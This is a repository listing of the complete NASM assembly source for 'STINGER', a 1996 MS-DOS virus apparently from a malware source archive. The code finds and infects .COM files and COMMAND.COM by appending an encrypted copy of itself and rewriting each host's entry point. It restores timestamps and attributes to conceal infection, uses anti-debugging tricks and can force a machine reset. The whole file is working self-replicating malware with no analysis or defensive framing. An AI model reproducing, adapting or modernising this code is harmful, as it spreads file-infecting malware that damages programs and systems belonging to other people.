MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.stinger.asm

437 lines
7.9 KiB
NASM
Raw Normal View History

2021-01-12 23:58:25 +00:00
;************************************
;************** STINGER *************
;******** (c) 1996 by [TAVC] ********
;********** -=* RedArc *=- **********
;************************************
Model tiny
.code
.386
kode_crypt equ 0
ORG 100h
START:
pusha
push ds
push es
push cs
pop ds
push cs
pop es
push di
mov di,offset VIRUS
ret
IDENT db 0ah,0dh,'STINGER',0ah,0dh,'$'
START_LEN equ $-START
int 20h
VIRUS:
jmp Ok_1
Ok_0:
mov ax,1010h
out 70h,ax
mov al,0feh
out 64h,al
Flag_Ofs equ $-VIRUS
Flag db 0
;---------------------
LOC_2_ equ $-VIRUS
LOC_2:
pop ax
pop cx
inc ax
xchg ax,cx
push cx
push ax
mov ax,LOC_3_
mov cx, bp
xchg ax,cx
add cx,ax
push cx
db 2eh
pushf
pop ax
sahf
jnb L_2_1
mov ax,1010h
out 70h,ax
mov al,0feh
out 64h,al
L_2_1:
ret
;------------------------
HAND_OFS equ $-VIRUS
Handle dw ?
Write_To_File:
mov word ptr [bp+HAND_OFS],bx
mov byte ptr [bp+Flag_Ofs],1
jmp DECRYPT
My_Loc_1:
mov byte ptr [bp+Flag_Ofs],0
mov dx,bp
mov cx,VIRLEN
mov bx,word ptr [bp+HAND_OFS]
mov ah,40h
int 21h
mov byte ptr [bp+Flag_Ofs],2
jmp DECRYPT
;------------------------
Ok_1:
call VIR_BEG
VIR_BEG_LEN equ $-VIRUS
VIR_BEG:
cli
mov al,0adh
out 64h,al
jmp short $+2
pop bp
sti
sub bp,VIR_BEG_LEN
DECRYPT:
Code_Ofs equ $-VIRUS
mov ax, kode_crypt
xor cx,cx
cmp ax,cx
jne DC_0
mov ax, DC_3_
add ax,bp
push ax
ret
;------------------------------------
LOC_4_ equ $-VIRUS
LOC_4:
db 2eh
pushf
pop ax
sahf
jnb LOC_4_1
mov ax,1010h
out 70h,ax
mov al,0feh
out 64h,al
LOC_4_1:
ret
;------------------------
DC_0:
mov di, CRYPT_END
add di,bp
push ax
mov ax, bp
add ax, M_L_1_
push ax
mov ax, LOC_4_
add ax, bp
push ax
ret
M_L_1_ equ $-VIRUS
M_L_1:
pop ax
mov si, CRYPT_START
add si,bp
DC_1:
DC_1_ equ $-VIRUS
mov bx, word ptr cs:[si]
push bp
mov dx, word ptr cs:[si+2]
xchg cx,dx
push si
xchg bx,dx
mov si,di
xor cx,ax
pop di
xchg cx,ax
push si
xchg ax,bx
mov si,di
xchg cx,dx
pop bp
xchg ax,dx
xchg si,bp
xchg bx,dx
mov di,si
xor cx,ax
xchg bp,si
xchg cx,ax
sub bp,di
xchg bx,dx
add bp,si
xchg dx,cx
xchg bp,si
xchg ax,dx
xor bp,si
xchg dx,bx
add bp,di
mov cl,4
xchg bp,di
mov word ptr cs:[si],bx
pop bp
call LOC_1
mov word ptr cs:[si+2],dx
DC_2:
inc si
loop DC_2
cmp si,di
jge DC_3
mov dx, DC_1_
mov cx, bp
DC_4:
inc dx
loop DC_4
push dx
ret
;------------------------
LOC_1:
push cx
push ax
mov ax,bp
mov cx,LOC_2_
L_1:
inc ax
loop L_1
push ax
ret
;------------------------
LOC_3_ equ $-VIRUS
LOC_3:
pop cx
mov ax,bp
add ax,LOC_3_1_
push ax
mov ax,bp
add ax,LOC_4_
push ax
ret
LOC_3_1_ equ $-VIRUS
LOC_3_1:
pop ax
xor ch,ch
jmp LOC_4_1
;------------------------
DC_3:
DC_3_ equ $-VIRUS
push ax
mov ah, byte ptr [bp+Flag_Ofs]
cmp ah,1
pop ax
jnz My_Loc_2
jmp My_Loc_1
CRYPT_START equ $-VIRUS
;********************************************************
My_Loc_2:
mov ah, byte ptr [bp+Flag_Ofs]
cmp ah,2
jnz My_Loc_3
ret
My_Loc_3:
cli
mov al,0aeh
out 64h,al
jmp short $+2
sti
;-------------------------------------------------------
Restore_Beg:
mov si,P_B_Ofs
mov di,100h
add si,bp
mov cx,START_LEN
rep movsb
SET_DTA_VIRII:
mov ah,1ah
mov dx,bp
add dx,VIRLEN
push dx
int 21h
pop si
FIND_FIRST:
mov dx,bp
add dx,C_M_Ofs
cld
mov ah,4eh
mov cx,0ffh
INTERRUPT:
int 21h
jb Not_File
call Infected
mov ah,4fh
jmp short INTERRUPT
Not_File:
call Command_Com
mov ah,1ah
mov dx,80h
int 21h
;---------------------
RETURN_TO_PROG:
pop es
pop ds
popa
jmp si
;---------------------
Infected:
mov dx, si
add dx,1eh
push dx
Clear_Attrib:
mov ax,4301h
xor cx,cx
int 21h
Open_File:
mov ax, 3d02h
int 21h
jb NextFind
Save_Handle:
xchg ax,bx
Read_Beg:
mov ah,3fh
mov dx,bp
add dx,P_B_Ofs
mov cx,START_LEN
int 21h
Check_Ident:
push si
mov si,bp
mov di,si
add si,New_Begin
add di,P_B_Ofs
add si,IDENT_Ofs
add di,IDENT_Ofs
mov cx,12
rep cmpsb
pop si
je Close_File
jmp short Plague
Close_File:
mov ax,5701h
mov dx, word ptr [si+18h]
mov cx, word ptr [si+16h]
int 21h
mov ah,3eh
int 21h
mov ax,4301h
pop dx
mov cx,word ptr [si+15h]
int 21h
ret
NextFind:
pop dx
ret
Plague:
mov ax,4202h
xor cx,cx
xor dx,dx
push cx
push cx
int 21h
mov word ptr [bp+OldLen],ax
call New_Code
pusha
call Write_To_File
Ret_From_Write:
popa
mov ax,4200h
pop cx
pop dx
int 21h
Calculate_New_Entry_Point:
mov di,bp
add di,New_Adr_Jump
inc di
mov ax, word ptr [bp+OldLen]
add ax, 100h
mov word ptr [di],ax
WRITE_New_Beg:
mov ah,40h
mov cx,START_LEN
mov dx,bp
add dx,New_Begin
int 21h
jmp Close_File
;---------------------
Command_Com:
push ds
mov di,bp
mov si,2ch
mov ds,cs:[si]
mov si,0008
add di, VIRLEN
add di,2ch
mov cx,0040h
rep movsb
sub di,40h
pop ds
mov dx,di
mov ah,4eh
mov cx,0ffh
int 21h
mov di,bp
jb EXITER
mov ah,2fh
int 21h
mov bx,di
add bx,VIRLEN
add bx,0eh
xchg bx,si
call INFECTED
EXITER:
ret
;---------------------
New_Code:
push ax
push bx
push cx
push di
mov ax, word ptr [si+1ah]
mov bx, word ptr [si+18h]
mov cx, word ptr [si+16h]
xor bx,cx
cmp bx,cx
jnz N_C_1
jmp Ok_0_My
N_C_1:
xor ax,bx
mov di,bp
add di,Code_Ofs
mov word ptr [di+1],ax
pop di
pop cx
pop bx
pop ax
ret
Ok_0_My:
mov ah, 09h
mov dx,bp
add dx,IDENT_Ofs
int 21h
jmp Ok_0
;---------------------
P_B_Ofs equ $-VIRUS
PROGRAM_BEG db START_LEN dup (90h)
C_M_Ofs equ $-VIRUS
COM_MASK db '*.COM',0h
E_M_Ofs equ $-VIRUS
OldLen equ $-VIRUS
dw ?
My_START:
New_Begin equ $-VIRUS
pusha
push ds
New_Adr_Jump equ $-VIRUS
mov di,offset VIRUS
push es
push cs
pop ds
push di
push cs
pop es
ret
IDENT_Ofs equ $-My_Start
db 0ah,0dh,'STINGER',0ah,0dh,'$'
;********************************************************
CRYPT_END equ $-VIRUS
VIRLEN equ $-VIRUS
END START